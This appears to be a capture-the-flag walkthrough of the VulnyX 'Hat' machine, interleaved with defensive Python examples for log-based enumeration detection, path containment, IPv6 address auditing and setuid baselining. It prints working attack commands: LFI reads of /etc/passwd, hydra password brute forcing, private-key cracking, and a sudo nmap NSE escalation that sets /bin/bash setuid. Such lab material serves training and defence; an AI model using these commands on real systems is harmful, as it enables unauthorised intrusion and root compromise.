Vlx_Hat

Target source: https://vulnyx.com/

Difficulty: Medium

Mind map: (image not reproduced)

I. Information Gathering

1. Host discovery

```
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 09:53 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00079s latency).
MAC Address: 0A:00:27:00:00:06 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00052s latency).
MAC Address: 08:00:27:AE:E2:AB (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.8
Host is up (0.0011s latency).
MAC Address: 08:00:27:85:A9:33 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.64 seconds
```

Target IP: `192.168.2.8`

2. Port scanning

1) Full port scan

```
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.8
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 09:54 +0800
Nmap scan report for 192.168.2.8
Host is up (0.00045s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    filtered ssh
80/tcp    open     http
65535/tcp open     unknown
MAC Address: 08:00:27:85:A9:33 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.16 seconds
```

Open ports: 80 and 65535. Port 22 is in the filtered state.

2) Service and version scan

```
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,65535 192.168.2.8
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 09:54 +0800
Nmap scan report for 192.168.2.8
Host is up (0.00074s latency).

PORT      STATE    SERVICE VERSION
22/tcp    filtered ssh
80/tcp    open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
65535/tcp open     ftp     pyftpdlib 1.5.4
| ftp-syst:
|   STAT:
| FTP server status:
|  Connected to: 192.168.2.8:65535
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
MAC Address: 08:00:27:85:A9:33 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.80 seconds
```

3) UDP scan

```
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.8
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 09:55 +0800
Nmap scan report for 192.168.2.8
Host is up (0.0011s latency).
All 100 scanned ports on 192.168.2.8 are in ignored states.
Not shown: 53 closed udp ports (port-unreach), 47 open|filtered udp ports (no-response)
MAC Address: 08:00:27:85:A9:33 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 53.72 seconds
```

II. Web Enumeration

1. Port 80

Browsing to port 80 shows only the Apache default page.

2. Directory scanning

```
┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.8 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
...
logs                 (Status: 301) [Size: 309] [--> http://192.168.2.8/logs/]
php-scripts          (Status: 301) [Size: 316] [--> http://192.168.2.8/php-scripts/]
...
```

Two directories were found, /logs and /php-scripts. Visiting either of them directly shows nothing.

1) /logs

Run a second scan against the /logs directory, this time for .log files.

```
┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.8/logs/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x log

vsftpd.log           (Status: 200) [Size: 1760]
```

View vsftpd.log

```
┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.8/logs/vsftpd.log

[I 2021-09-28 18:43:57] >>> starting FTP server on 0.0.0.0:21, pid=475 <<<
[I 2021-09-28 18:43:57] concurrency model: async
[I 2021-09-28 18:43:57] masquerade (NAT) address: None
[I 2021-09-28 18:43:57] passive ports: None
[I 2021-09-28 18:44:02] 192.168.1.83:49268-[] FTP session opened (connect)
[I 2021-09-28 18:44:06] 192.168.1.83:49280-[] USER 'l4nr3n' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49290-[] USER 'softyhack' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49292-[] USER 'h4ckb1tu5' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49272-[] USER 'noname' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49278-[] USER 'cromiphi' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49284-[] USER 'b4el7d' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'shelldredd' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'anonymous' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49292-[] USER 'alienum' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[] USER 'k1m3r4' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49284-[] USER 'tatayoyo' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49278-[] USER 'Exploiter' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49268-[] USER 'tasiyanci' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49274-[] USER 'luken' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49270-[] USER 'ch4rm' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49282-[] FTP session closed (disconnect).
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] USER 'admin_ftp' logged in.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] FTP session closed (disconnect).
[I 2021-09-28 18:44:12] 192.168.1.83:49272-[] FTP session closed (disconnect).
```

Every username fails except one: the log records admin_ftp logging in successfully, so admin_ftp is a valid FTP username. (Despite its file name, the log is in pyftpdlib's format, matching the service on port 65535.)
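From the defender's side, the log above is a textbook username-enumeration pattern: one source address cycling through many usernames within seconds, followed by a successful login. The following is an added example, not part of the original write-up, that parses pyftpdlib-style log lines and raises two alerts: many distinct usernames from one IP inside a short window, and a success from an IP that already accumulated failures. The sample lines are constructed in the shape of the recovered log (the 10.0.0.5 entries are invented for contrast); the thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in pyftpdlib's "[L YYYY-MM-DD HH:MM:SS] message" shape.
SAMPLE_LOG = """\
[I 2021-09-28 18:43:57] >>> starting FTP server on 0.0.0.0:21, pid=475 <<<
[I 2021-09-28 18:44:02] 192.168.1.83:49268-[] FTP session opened (connect)
[I 2021-09-28 18:44:06] 192.168.1.83:49280-[] USER 'l4nr3n' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49290-[] USER 'softyhack' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49292-[] USER 'h4ckb1tu5' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49272-[] USER 'noname' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49278-[] USER 'cromiphi' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49292-[] USER 'alienum' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[] USER 'k1m3r4' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] USER 'admin_ftp' logged in.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] FTP session closed (disconnect).
[I 2021-09-28 19:10:00] 10.0.0.5:51000-[] USER 'bob' failed login.
[I 2021-09-28 19:10:30] 10.0.0.5:51001-[bob] USER 'bob' logged in.
"""

# Lines that carry a client address look like "<ip>:<port>-[<session user>] <message>".
LINE_RE = re.compile(
    r"^\[(?P<lvl>[A-Z]) (?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\] "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)-\[(?P<session_user>[^\]]*)\] "
    r"(?P<msg>.*)$"
)
USER_RE = re.compile(r"USER '(?P<user>[^']*)' (?P<result>failed login|logged in)\.")


def parse_auth_events(text):
    """Return a list of (timestamp, ip, username, success) in file order."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # start-up and configuration lines carry no client address
        u = USER_RE.search(m.group("msg"))
        if not u:
            continue  # connect / disconnect lines are not authentication events
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
        events.append((ts, m.group("ip"), u.group("user"), u.group("result") == "logged in"))
    return events


def find_enumeration(events, window=timedelta(seconds=60), min_distinct=5):
    """Map source IP -> number of distinct usernames that failed inside one window."""
    by_ip = defaultdict(list)
    for ts, ip, user, ok in events:
        if not ok:
            by_ip[ip].append((ts, user))
    alerts = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):  # slide the window over each start
            users = {u for t, u in attempts[i:] if t - start <= window}
            if len(users) >= min_distinct:
                alerts[ip] = len(users)
                break
    return alerts


def find_success_after_failures(events, min_failures=3):
    """Successful logins from an IP that had already failed >= min_failures times."""
    failures = defaultdict(int)
    hits = []
    for ts, ip, user, ok in events:  # file order is chronological
        if ok:
            if failures[ip] >= min_failures:
                hits.append((ip, user, failures[ip]))
        else:
            failures[ip] += 1
    return hits


if __name__ == "__main__":
    evs = parse_auth_events(SAMPLE_LOG)
    print("enumeration:", find_enumeration(evs))
    print("success after failures:", find_success_after_failures(evs))
```

Both detections key on the source address rather than the username, because enumeration spreads across many usernames by design; the second rule is the one that catches the exact sequence in the recovered log.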

2) /php-scripts

Now scan the /php-scripts directory for PHP files.

```
┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.8/php-scripts/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

file.php             (Status: 200) [Size: 0]
```

Visiting file.php returns a blank page. (image not reproduced)

III. Local File Inclusion (LFI)

Fuzz the name of the GET parameter that file.php accepts, using /etc/passwd as the value and filtering out the blank 20-byte responses.

```
┌──(root㉿kali)-[~/miaosec]
└─# ffuf -u http://192.168.2.8/php-scripts/file.php?FUZZ=/etc/passwd -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -fs 20 -ac

6                       [Status: 200, Size: 1404, Words: 13, Lines: 27, Duration: 9ms]
```

One parameter name produces a different response: 6.

1) Obtain usernames

Read /etc/passwd (only the lines with a login shell are shown)

```
┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.8/php-scripts/file.php?6=/etc/passwd

root:x:0:0:root:/root:/bin/bash
cromiphi:x:1000:1000:cromiphi,,,:/home/cromiphi:/bin/bash
```

The user cromiphi is found.
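The source of file.php is not shown in the write-up, but the behaviour above (an arbitrary path read straight from a query parameter) is the defect to fix. As an added example, not code from the target or the write-up, the following shows how a file-serving handler should constrain such a parameter: refuse absolute paths, resolve the result with realpath so `..` segments and symlinks are collapsed, and then require that the resolved path still lies under an allowed base directory. The `demo()` function builds a small constructed directory tree under a temporary directory to exercise each case; the base directory name and file names are assumptions.

```python
import os
import tempfile


def resolve_under_base(base_dir, requested):
    """Return the absolute path for `requested` only if it stays inside base_dir.

    Rejects absolute paths, NUL bytes, '..' traversal and symlinks that point
    outside base_dir; returns None for anything that would leave the directory.
    """
    base = os.path.realpath(base_dir)
    if os.path.isabs(requested) or "\x00" in requested:
        return None
    # realpath collapses '..' and follows symlinks before the containment check,
    # so a link inside base_dir pointing elsewhere is caught as well.
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def read_allowed_file(base_dir, requested, max_bytes=65536):
    """Read at most max_bytes of a regular file below base_dir, else None."""
    path = resolve_under_base(base_dir, requested)
    if path is None or not os.path.isfile(path):
        return None
    with open(path, "rb") as fh:
        return fh.read(max_bytes)


def demo():
    """Constructed tree: <tmp>/www is the allowed base, <tmp>/secret.txt is outside it."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "www")
    os.mkdir(base)
    with open(os.path.join(base, "readme.txt"), "w") as fh:
        fh.write("public\n")
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("private\n")
    # A symlink inside the base that escapes it, to show realpath handling.
    os.symlink(os.path.join(root, "secret.txt"), os.path.join(base, "escape"))
    return {
        "plain": read_allowed_file(base, "readme.txt"),
        "traversal": read_allowed_file(base, "../secret.txt"),
        "absolute": read_allowed_file(base, "/etc/passwd"),
        "symlink": read_allowed_file(base, "escape"),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:10s} -> {result!r}")
```

Where the handler only ever needs to serve a fixed set of files, an explicit allowlist of names is simpler still; the containment check above is the general form for when the set is a directory.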

2) Obtain the IPv6 address

Because port 22 is filtered over IPv4, read /proc/net/if_inet6 through the file read to learn the host's IPv6 addresses.

```
┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.8/php-scripts/file.php?6=/proc/net/if_inet6
fe800000000000000a0027fffe85a933 02 40 20 80   enp0s3
00000000000000000000000000000001 01 80 10 80       lo
```

Convert the raw 32-hex-digit form into standard IPv6 notation (the first field of the first line, split into 4-digit groups joined by colons):

```
┌──(root㉿kali)-[~/miaosec]
└─# curl -sX GET "http://192.168.2.8/php-scripts/file.php?6=/proc/net/if_inet6" | awk 'NR==1 {print $1}' | fold -w4 | paste -sd ":"
fe80:0000:0000:0000:0a00:27ff:fe85:a933
```

IPv6 address obtained: fe80:0000:0000:0000:0a00:27ff:fe85:a933 (a link-local address on enp0s3, written fe80::a00:27ff:fe85:a933 in compressed form).
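The awk/fold/paste pipeline only handles the first line. As an added example (not from the write-up), the parser below reads every line of /proc/net/if_inet6 into structured records, decoding the remaining columns (interface index, prefix length, scope and flags, all hexadecimal) so that an administrator auditing a host can list exactly which IPv6 addresses a neighbour on the LAN could reach, the check that would have revealed the unfiltered SSH service here. The sample text is constructed from the two lines above plus an invented global address; the scope table covers the kernel's IPV6_ADDR_* scope values.

```python
import ipaddress

# Constructed sample in the format of /proc/net/if_inet6:
# <address hex> <ifindex> <prefix length> <scope> <flags> <device>
SAMPLE_IF_INET6 = """\
fe800000000000000a0027fffe85a933 02 40 20 80   enp0s3
00000000000000000000000000000001 01 80 10 80       lo
20010db8000000000a0027fffe85a933 02 40 00 80   enp0s3
"""

# Kernel scope values as they appear in /proc/net/if_inet6.
SCOPE_NAMES = {0x00: "global", 0x10: "host", 0x20: "link", 0x40: "site"}


def parse_if_inet6(text):
    """Return one dict per address line; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6 or len(parts[0]) != 32:
            continue
        hex_addr, ifindex, prefix_len, scope, flags, dev = parts
        entries.append({
            # IPv6Address accepts the 128-bit integer directly, so no manual
            # colon insertion is needed; .exploded gives the long form.
            "address": ipaddress.IPv6Address(int(hex_addr, 16)),
            "ifindex": int(ifindex, 16),
            "prefix_len": int(prefix_len, 16),
            "scope": SCOPE_NAMES.get(int(scope, 16), "unknown"),
            "flags": int(flags, 16),
            "device": dev,
        })
    return entries


def reachable_from_lan(entries):
    """Addresses a host on the same link could connect to (everything but loopback)."""
    return [e for e in entries if e["device"] != "lo" and e["scope"] != "host"]


def link_local_literal(entry, zone):
    """Format a link-local address with the zone id a scanner on `zone` must use."""
    return f"{entry['address']}%{zone}"


if __name__ == "__main__":
    for e in parse_if_inet6(SAMPLE_IF_INET6):
        print(e["device"], e["scope"], e["address"].exploded, f"/{e['prefix_len']}")
```

The practical takeaway for a defender is that a host firewall written only with IPv4 rules (iptables) leaves every address in this list open unless matching ip6tables or nftables rules exist; enumerating the file on each host is the quickest way to see which addresses those rules must cover.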

Scan the IPv6 address with nmap for open ports (the %eth1 zone id selects the attacker's interface for the link-local address):

```
┌──(root㉿kali)-[~/miaosec]
└─# nmap -6 -p- fe80:0000:0000:0000:0a00:27ff:fe85:a933%eth1
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 14:55 +0800
Nmap scan report for fe80::a00:27ff:fe85:a933
Host is up (0.00040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:85:A9:33 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.71 seconds
```

Over IPv6, ports 22 and 80 are open: the filter that blocks SSH on IPv4 is not applied to IPv6.

IV. FTP (pyftpdlib)

The service on port 65535 is pyftpdlib 1.5.4. pyftpdlib is an FTP server library written in Python that lets you stand up a fully functional FTP (File Transfer Protocol) service quickly; from the client's point of view it behaves like any other FTP server.

Connecting with the ftp client as admin_ftp requires a password.

```
┌──(root㉿kali)-[~/miaosec]
└─# ftp 192.168.2.8 65535
Connected to 192.168.2.8.
220 pyftpdlib 1.5.4 ready.
Name (192.168.2.8:root): admin_ftp
331 Username ok, send password.
Password:
530 Authentication failed.
ftp: Login failed
ftp>
ftp> exit
221 Goodbye.
```

Use hydra to brute-force the FTP password for admin_ftp

```
┌──(root㉿kali)-[~/miaosec]
└─# hydra -t 4 -l admin_ftp -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.8:65535

[65535][ftp] host: 192.168.2.8   login: admin_ftp   password: cowboy
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-26 11:41:16
```

Credentials obtained: admin_ftp:cowboy

Log in to the FTP service

```
┌──(root㉿kali)-[~/miaosec]
└─# ftp 192.168.2.8 65535
Connected to 192.168.2.8.
220 pyftpdlib 1.5.4 ready.
Name (192.168.2.8:root): admin_ftp
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering extended passive mode (|||34371|).
125 Data connection already open. Transfer starting.
drwxrwxrwx   2 cromiphi cromiphi     4096 Sep 28  2021 share
226 Transfer complete.
```

Download the files from the share directory to the local machine

```
ftp> get id_rsa
ftp> get note
```

View note

```
┌──(root㉿kali)-[~/miaosec]
└─# cat note
Hi,

We have successfully secured some of our most critical protocols ... no more worrying!

Sysadmin
```

View id_rsa (an encrypted private key, as the Proc-Type/DEK-Info headers show)

```
┌──(root㉿kali)-[~/miaosec]
└─# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,6F30B7B22B088AB2

JmLJqI4m9jk1McrIzNFyuYrPyPu3Znw6awuyEIK0ZctgYabjNk5MVCM0FH45SQCl
rqK3QqSACiOq4+DnMWrECj5CO+JPzGjIupgz8IrW0Cr7mkRSNa9fCeEBrIzAi924
GEM72PMuwlBM4zWDZ/962gtZpDnzXYLc9mYdVTe+ubI2NrVC6d2ak1L5GMsBdYwi
BVj8bhnUsr4doXi1ZcRAZoHUses/Z8ohfNXkUoDO2d1kQmiE0hAVEUnBerzV+E84
GpJFBgHphboG9E+R3Gh27viM3pY0qFvU/PWbTJ8Y6LgSgJPMLldlEuBEym0LPDpc
27L7wdKEYwCjPWBGtuGnKsdfleQfsyKijH8/YDlH0hsrDc83ZMcDR13jtfZbZjHZ
IwVdhUuKdHp6Ig4lmxi1RqJA35CD6ZHHMzOKlm1TjQskA0j6jdPeJ3o5ebh/z3oe
tr3FKEawz+2KQa+CX+frCwN/rLFUc8MOvh7I4/jJ9o2kdKB0u5OHH+pgXfmhTJzl
mVSqOtti7cxefUb142Jltku5kElwKdvVEHw+qmZNMwrw+Kv7rlpvezfsW4uzm8Je
nlmxXoMl62Z3FKPjKarEqZrbO6bHf6lWAIrJgJGydRn1tpD/IY1DJZKwa0aLrkbr
7hu8C0LSpIVdy5ZUSaT04ZL/FBxDQR7cg2/ZYF5Kc1pvIgjXrlEsbbSPDyg2bLIW
eCMRnevvsTS8l55qUvQ2GO73kHMcWfkAsvUaojLiSxXGTcd+gPf6kXiwTbz2wbTR
KPzDwKaTn74yW+9jc88+6D8CdT6OrN+2eP8K0ukdNwMqVc+Mag0TOOCwq+QVfKwf
O7A+3+13xjUy1/TKRIJDXuhL88RDrzA7U4uy9ZDYEq5z2HVc3agqnHMBP4k2n0KE
u2YoCNOp52Q4YpKoXoz5Ojw8CuUIhNqoilh/0j+gkdgIO5jMAEBT7p6M/fnhfHpe
VNCimSJfTjLCU49Tez0HeDDCuE4oG/vShjM0ebZHMMWTY8vVOaRz4Ktcx938Jpnj
/j9Z0NEAEUI2ISZGGDLS/O0fhyN9lsl1UrY2yR3NnXgbX3YkjWLDM4C8mWSCejpl
XhWSUYlt8X83atlUfTcn97QVGeJXvlJhBUrYEtsTHjDc2lsH3KQNYtpckQizpcyW
axJjIeWhI+eqWIVwsXTxKI2hIa6XuYdjUP7cusDad+pUo1Y7h0wTwLP1KYtkXrm3
sEvB8X2mX6tHB+1iO67UKjFdZ7Ti1Q2XY6zCCbOl3S5b24MFAFANDYgkr1QtgQqs
j+tSrrd1yOn4AeM6SdyLdVxKQBY2s0+9dvLmaJLH9OOdV0G4I4WcMuum40WMzXrf
fBAMIh7Gl0lEWPOrPtOxrQI++kAlyzNTK1oxSvdc/f30TOB4hGH8yU3EKzRh/QTa
fHkcKP9V7Y0xKwrg2yLuWsFSt4QnFUZEbV+wDq2i9NqvriYOxSa2qarPP04FVZRp
5xYdSGWdMuPFTEAaM+67wR33zzlYKvnEmE9CRHnAqVpqHFuNmgYD+S3KhzW3X1A3
zlflWacIB06p/cXCr3w6XNqa0y2TsNmuT2IR6JX+Qr6usNV4QWL/Jyyy4dE1oBG6
-----END RSA PRIVATE KEY-----
```

V. RSAcrack

Because id_rsa is protected by a passphrase, brute-force the passphrase with RSAcrack.

```
┌──(root㉿kali)-[~/Tool]
└─# ./RSAcrack -k ../miaosec/id_rsa -w techyou.txt

╭━━━┳━━━┳━━━╮        ╭╮
┃╭━╮┃╭━╮┃╭━╮┃        ┃┃
┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
─────────────────────────────
code: d4t4s3c ver: v1.0.0
─────────────────────────────
[i] Cracking | ../miaosec/id_rsa
[i] Wordlist | techyou.txt
[*] Status   | 1594/20000/7%/ilovemyself
[+] Password | ilovemyself
─────────────────────────────
```

The key's passphrase is ilovemyself.

VI. Getting a shell as cromiphi

Connect over IPv6 with the key and its passphrase

```
┌──(root㉿kali)-[~/miaosec]
└─# ssh -i id_rsa -6 cromiphi@'fe80:0000:0000:0000:0a00:27ff:fe85:a933%eth1'
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Enter passphrase for key 'id_rsa':
Linux hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
cromiphi@hat:~$ id
uid=1000(cromiphi) gid=1000(cromiphi) groups=1000(cromiphi)
```

VII. Privilege Escalation

Check sudo -l

```
cromiphi@hat:~$ sudo -l
Matching Defaults entries for cromiphi on hat:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cromiphi may run the following commands on hat:
    (root) NOPASSWD: /usr/bin/nmap
```

cromiphi can run /usr/bin/nmap as root without a password.

Nmap's script engine (NSE) runs Lua, and os.execute() is the Lua function that runs a system command. So create a temporary file, store its path in the variable TF, write the command into that file, and run nmap with it as the script.

```
cromiphi@hat:~$ TF=$(mktemp)
cromiphi@hat:~$ echo 'os.execute("chmod 4755 /bin/bash")' > $TF
cromiphi@hat:~$ sudo /usr/bin/nmap --script=$TF
Starting Nmap 7.70 ( https://nmap.org ) at 2026-03-26 07:59 CET
NSE: Warning: Loading '/tmp/tmp.njpnct0nSV' -- the recommended file extension is '.nse'.
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:626: /tmp/tmp.njpnct0nSV is missing required field: 'action'
stack traceback:
        [C]: in function 'error'
        /usr/bin/../share/nmap/nse_main.lua:626: in field 'new'
        /usr/bin/../share/nmap/nse_main.lua:828: in local 'get_chosen_scripts'
        /usr/bin/../share/nmap/nse_main.lua:1315: in main chunk
        [C]: in ?

QUITTING!
cromiphi@hat:~$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash
```

Root is obtained. NSE rejected the file as a script because it lacks the required 'action' field, but the Lua chunk had already run while the file was being loaded, so the chmod took effect and /bin/bash is now setuid root, as the ls output shows.
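The outcome above leaves a durable artefact: a setuid-root copy of bash that a baseline integrity check would flag immediately. As an added example, not part of the original write-up, the following audits a host for setuid-root binaries and diffs the result against a known-good baseline, which is how the change to /bin/bash would be detected after the fact. `scan_tree()` walks a real directory; the test data and the baseline list are constructed and the paths in them are assumptions for illustration.

```python
import os
import stat


def find_setuid_root(entries):
    """entries: iterable of (path, st_mode, st_uid). Returns setuid files owned by uid 0."""
    return sorted(path for path, mode, uid in entries
                  if stat.S_ISREG(mode) and mode & stat.S_ISUID and uid == 0)


def scan_tree(root):
    """Collect (path, st_mode, st_uid) for every regular file under root.

    lstat is used so that symlinks are reported as links, not as their targets.
    """
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry: skip, do not abort the audit
            found.append((path, st.st_mode, st.st_uid))
    return found


def diff_against_baseline(current_setuid, baseline_setuid):
    """Compare the live set of setuid-root files with an approved baseline."""
    cur, base = set(current_setuid), set(baseline_setuid)
    return {"added": sorted(cur - base), "removed": sorted(base - cur)}


# Constructed stat results standing in for a scan of the compromised host.
SAMPLE_ENTRIES = [
    ("/bin/bash", stat.S_IFREG | 0o4755, 0),       # the setuid bit set during the walkthrough
    ("/usr/bin/passwd", stat.S_IFREG | 0o4755, 0),  # legitimately setuid
    ("/usr/bin/nmap", stat.S_IFREG | 0o755, 0),     # not setuid (abused via sudo instead)
    ("/home/cromiphi/tool", stat.S_IFREG | 0o4755, 1000),  # setuid but not root-owned
]

# Constructed baseline of setuid-root files expected on this host.
BASELINE = ["/usr/bin/passwd", "/usr/bin/sudo"]


def audit(entries=SAMPLE_ENTRIES, baseline=BASELINE):
    return diff_against_baseline(find_setuid_root(entries), baseline)


if __name__ == "__main__":
    print(audit())
    # Live run against a real tree, e.g. audit(scan_tree("/usr/bin"), BASELINE)
```

Keeping the baseline in a package manifest or a file-integrity tool and running the diff on a schedule turns a one-off exploit into an alert; the same baseline comparison applied to the sudoers rules would have flagged a passwordless rule for a binary that executes user-supplied scripts.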

```
cromiphi@hat:~$ /bin/bash -p
bash-5.0# id
uid=1000(cromiphi) gid=1000(cromiphi) euid=0(root) groups=1000(cromiphi)
```

VIII. Flags

```
bash-5.0# cat /root/root.txt /home/cromiphi/user.txt
8b4acc39c4d068623a16a89ebecd5048
d3ea66f59d9d6ea12351b415080b5457
```

Vlx_Hat
http://miao-sec.github.io/Vulnyx/Vlx-Hat/
Author: Miao
Published: 26 March 2026
License: BY-MIAO